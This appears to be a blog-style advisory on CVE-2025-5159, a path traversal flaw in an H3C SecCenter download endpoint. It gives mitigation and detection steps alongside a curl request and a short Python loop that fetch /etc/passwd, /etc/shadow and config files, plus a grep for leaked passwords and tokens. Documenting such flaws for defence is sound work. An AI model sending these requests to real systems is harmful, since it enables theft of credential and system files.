H3C SecCenter SMP-E1114P02, Path Traversal, CVE-2025-5159 (Medium)

Listen to this Post

How CVE-2025-5159 Works

This vulnerability exploits improper input validation in the `/cfgFile/1/download` endpoint of H3C SecCenter SMP-E1114P02 (up to version 20250513). By manipulating the `Name` parameter, an attacker can perform path traversal (e.g., ../../etc/passwd), allowing unauthorized access to sensitive files outside the intended directory. The flaw stems from insufficient sanitization of user-supplied input before processing file operations. Remote exploitation is possible without authentication, though the impact is limited to file disclosure (no RCE).

DailyCVE Form

Platform: H3C SecCenter
Version: SMP-E1114P02 (≤20250513)
Vulnerability: Path Traversal
Severity: Medium (CVSS:5.3)
Date: 2025-05-25

Prediction: Patch by 2025-07-15

What Undercode Say:

Exploitation

1. Craft Malicious Request:

curl -X GET "http://target/cfgFile/1/download?Name=../../../../etc/passwd"

2. Automated Scanning:

import requests
payloads = ["../../../etc/shadow", "../../../conf/config.yml"]
for payload in payloads:
r = requests.get(f"http://target/cfgFile/1/download?Name={payload}")
if r.status_code == 200: print(f"Leaked: {payload}")

Mitigation

1. Input Sanitization:

from pathlib import Path
safe_name = Path(request.args.get('Name')).name Basename only

2. WAF Rules:

location /cfgFile/ {
if ($args ~ "../") { return 403; }
}

3. Patch Verification:

grep -r "download" /webroot/cfgFile/ | grep -i "path.resolve"

Detection

1. Log Monitoring:

tail -f /var/log/nginx/access.log | grep -E "../.download"

2. YARA Rule:

rule cve_2025_5159 {
strings: $ = "/cfgFile/1/download?Name=" nocase
condition: any of them
}

Post-Exploitation

  • Exfiltrated Data Analysis:
    strings leaked_file | grep -E "user|password|token"
    

References

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top